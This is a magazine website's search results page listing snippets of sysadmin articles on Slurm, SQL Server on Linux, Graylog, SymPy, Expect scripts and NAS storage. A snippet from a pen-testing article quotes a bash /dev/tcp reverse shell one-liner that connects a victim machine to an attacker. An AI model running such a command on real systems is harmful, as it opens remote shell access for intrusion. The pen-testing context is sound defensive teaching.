Admin Magazine
 
  • News
  •  
  • Articles
  •  
  • Tech Tools
  •  
  • Subscribe
  •  
  • Archive
  •  
  • Whitepapers
  •  
  • Digisub
  •  
  • Write for Us!
  •  
  • Newsletter
  •  
  • Shop
  • DevOps
  • Cloud Computing
  • Virtualization
  • HPC
  • Linux
  • Windows
  • Security
  • Monitoring
  • Databases
  • all Topics...
Search
Login
ADMIN Magazine on Facebook
GooglePlus

Search

Refine your search
Sort order
  • Date
  • Score
Content type
  • Article (Print) (92)
  • Article (29)
Keywords
Creation time
  • Last day
  • Last week
  • Last month
  • Last three months
  • Last year

1 2 3 4 5 6 7 ... 13 Next »

100%
Assess USB performance while exploring storage caching
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © Lucy Baldwin, 123RF.com
|__ Port 5: Dev 2, If 0, Class=Video, Driver=uvcvideo, 480M |__ Port 7: Dev 3, If 0, Class=Wireless, Driver=btusb, 12M |__ Port 7: Dev 3, If 1, Class=Wireless, Driver=btusb, 12M |__ Port 10: Dev ... 48
97%
Resource Management with Slurm
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © Vladislav Kochelaevs, fotolia.com
.conf file generated by configurator.html. 08 # 09 # See the slurm.conf man page for more information. 10 # 11 ClusterName=compute-cluster 12 ControlMachine=slurm-ctrl 13 # 14 SlurmUser=slurm 15 Slurmctld ... 48
96%
Comparing 5 to 50TB NAS storage boxes
31.10.2025
Home »  Archive  »  2012  »  Issue 12: NAS S...  » 
© Franck Boston, fotolia.com
that could justify the higher initial cost. Synology DS2413+ The DiskStation 2413+ is a brand-new, top-end model with 12 disk slots. This means it can accommodate up to 48TB storage, and you can even double ... 12
96%
Exploring SQL Server on Linux
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © yewkeo, 123RF.com
Agent 10 mssql-server-fts.x86_64 : Microsoft SQL Server Full Text Search 11 mssql-server-ha.x86_64 : High Availability support for Microsoft SQL Server Relational Database Engine 12 mssql-server-is.x86 ... 48
96%
Symbolic mathematics with Python's SymPy library
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © Buchachon Petthanya, 123RF.com
to explore heat conduction calculations. All the examples presented here use the Spyder 3.2.8 Python development environment (Anaconda 5.2.0) on Mint 19.0 Xfce. Because the full code is too long for a printed ... 48
96%
Improved defense through pen testing
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image Photo by Simeon Jacobson on Unsplash
with Computer A (the victim system) receiving the following code: $ bash -I <& /dev/tcp/10.0.0.1/444 0<&1 that causes Computer A to connect to Computer B (the attacking system that receives the connection from ... 48
95%
Installing and operating the Graylog SIEM solution
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © Leo Blanchette, 123RF.com
Modules xm_gelf 09 10 11 # Use for windows vista/2008 and higher: 12 modules in the_msvistalog 13 14 # Use for windows Windows XP/2000/2003: 15 # Modules in_mseventlog 16 17 ... 48
95%
Workflow-based data analysis with KNIME
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image © Andrea De Martin, 123RF.com
], Weka [9], LIBSVM [10], and the deep learning frameworks Keras [11], TensorFlow [12], and DL4J [13]. Supported by the various possibilities to import, export, visualize, and manipulate data, KNIME offers ... 48
95%
D-Wave's Murray Thom discusses the present and future of quantum computing.
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
increasingly difficult problems" explained Murray Thom, director of Quantum Cloud Services at D-Wave. Classical computers use bits of information that live in one state (0 or 1) at a time. A quantum computer ... 48
95%
Using Expect scripts to automate tasks
31.10.2025
Home »  Archive  »  2012  »  Issue 12: NAS S...  » 
© Kheng Ho Toh, 123RF.com
42 spawn $env(SHELL) 43 match_max 100000 44 expect -exact "]0;khess@trapper: ~khess@trapper:~\$ " 45 send -- "ssh aspen\r" 46 expect -exact "ssh aspen\r 47 khess@aspen's password: " 48 send ... 12

1 2 3 4 5 6 7 ... 13 Next »

Service

  • Article Code
  • Contact
  • Legal Notice
  • Privacy Policy
  • Glossary
    • Backup Test
© 2025 Linux New Media USA, LLC – Legal Notice